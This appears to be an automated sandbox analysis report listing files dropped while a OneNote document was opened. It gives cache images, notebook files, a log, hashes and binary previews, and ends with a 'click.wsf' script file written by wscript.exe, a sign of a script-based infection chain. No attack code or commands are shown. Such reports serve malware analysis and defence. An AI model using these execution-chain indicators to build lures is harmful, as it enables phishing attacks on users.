                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B2.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):67991
                                                                                                  Entropy (8bit):7.870481231782746
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                  MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                  SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
                                                                                                  SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                  SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B4.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22203
                                                                                                  Entropy (8bit):6.977175130747846
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                  MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                  SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                  SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                  SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B6.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):15740
                                                                                                  Entropy (8bit):6.0674556182683945
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                  MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                  SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                  SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                  SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000B8.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):86187
                                                                                                  Entropy (8bit):7.951356272886186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                  MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                  SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                  SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                  SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BA.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11197
                                                                                                  Entropy (8bit):7.975073010774664
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                  MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                  SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                  SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                  SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BC.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):19920
                                                                                                  Entropy (8bit):7.987696084459766
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                  MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                  SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                  SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                  SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...X...>......y=h....PLTE..................................t........iw..............................................._n|...Tds...ky......................................................p~.....................................................dr.................v.............................................n{.......ap}..........x.....z...................u......................|..Vfu............r.....w........................................~...................Zjx...................................Yiw............w..|....................Xgv{.....y...........................jx..............\lz.........}..z.....t..[ky........u..y.....gu................................{..........}.....u....................~...........y....r.....bKGD....H....cmPPJCmp0712....H.s...JfIDATx^...\.W./.}....Sy...(..4....D.-.....H...% .$"D.Qr.......`..;...6...N......s...^...L.....Y{.GQU`..~...j....{...-Ax.K..&.....F..I\i..

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BE.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):179460
                                                                                                  Entropy (8bit):7.979020171518325
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                  MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                  SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                  SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                  SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BG.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):109698
                                                                                                  Entropy (8bit):7.954100577911302
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                  MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                  SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                  SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                  SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BI.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):41893
                                                                                                  Entropy (8bit):7.52654558351485
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                  MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                  SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                  SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                  SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BL.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):68633
                                                                                                  Entropy (8bit):7.709776384921022
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                  MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                  SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                  SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                  SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BN.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):59832
                                                                                                  Entropy (8bit):7.308211468398169
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                  MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                  SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                  SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                  SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                  C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\000000BP.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:modified
                                                                                                  Size (bytes):53259
                                                                                                  Entropy (8bit):7.651662052139301
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                  MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                  SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                  SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                  SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                  C:\Users\user\AppData\Local\Temp\OneNote Archive\Getting Started.one

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):362512
                                                                                                  Entropy (8bit):7.486505527638424
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6144:EyHwh4AIZ5A1QM6vUbHCkCBVoqx5HUvFOAjNPySj8MTcrOQMhuNBSMl:YWZ5A10vUbikCBVoqx5wOuqSJTcOQMZE
                                                                                                  MD5:C5A9F05074E4648BCBC524C9185C2241
                                                                                                  SHA1:20DF50B6ADAB7B838209F6182E65FDC1FE8FCB49
                                                                                                  SHA-256:673F6566262563A0AAD4A812D93BD831B1DAF761ABE78C64F0550B2B47A84A98
                                                                                                  SHA-512:1563FBEADF08BD4EA47F64F6904C6EDBE1461489C8F92723B3EA8D6254A49C329550FBAA7FFC57E25A50555E36EB973439345AD4192DE6F71D91967427490048
                                                                                                  Malicious:false
                                                                                                  Preview:.R\{..M..Sx.)...).=y5.L.;.5j-..................?.....I.......*...*...*...*....................................................w.$...J..m.....d(.x...........(~......................8.......0...................A...`G4@..&.?.w........@.....E..&.K..0............................U....7..U....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\OneNote Archive\Open Notebook.onetoc2

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):5136
                                                                                                  Entropy (8bit):2.768508082547218
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:r1bntD/uUPv4om1mAlthbXyL+IykacQIac3:xqnrDeilkavIaq
                                                                                                  MD5:D425DB2C64DB691C250CE3FFDF5E5144
                                                                                                  SHA1:F50005447067A1170BDBCBE294BDC5B7EA241BFB
                                                                                                  SHA-256:F5DFF5B25EE516F511047479572B80370FF5D60E2E2B5206C006EA6B7ACE5501
                                                                                                  SHA-512:7D43BF6A2C91F9484A53EDC5D1D25494E348509C453496BB09BDF681F17939156908C1501900E376E384DF5B1B6441BBA0E270CDF7E404FBDE06F0B45C22C020
                                                                                                  Malicious:false
                                                                                                  Preview:./.C..vL....W"v_.w.$...J..m....................?.....I..............................................................................................................................................................i.4EI...:..].........[_n.r..M.moC.d].............................r....7..r....7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):16384
                                                                                                  Entropy (8bit):0.3263923539407622
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:Uv/mYLyaq99957MkEC0nb+i3qQ137v+uLN:O9Lya86JLlL+w
                                                                                                  MD5:D7A22099067890278BE61C6830768518
                                                                                                  SHA1:881FFC18CC43A6EB96DAA653465E54B6B5B191CF
                                                                                                  SHA-256:3775D1CBA46662AF9695B0AEACB8BB034CCDE5A0431237760A9ADE0A47765B33
                                                                                                  SHA-512:78C00839E613C00B3650C495CA20662BA98B7098BF0D327B303A99E7FC696BE4D27958A7FB80861A973C4376D0A0972D66AF91D6CC9552074F59A75671430BA3
                                                                                                  Malicious:false
                                                                                                  Preview:.@..`...........................................`........................................RI..............@.......B..............Zb..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1............................................................C.k...... .....2H..k[..........O.n.e.N.o.t.e. .W.a.t.s.o.n. .L.o.g...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.n.e.N.o.t.e.1.5.W.a.t.s.o.n.L.o.g...e.t.l.......P.P..........nJ.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                  C:\Users\user\AppData\Local\Temp\click.wsf

                                                                                                  Download File
                                                                                                  Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):9
                                                                                                  Entropy (8bit):2.94770277922009
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:tWn:tWn
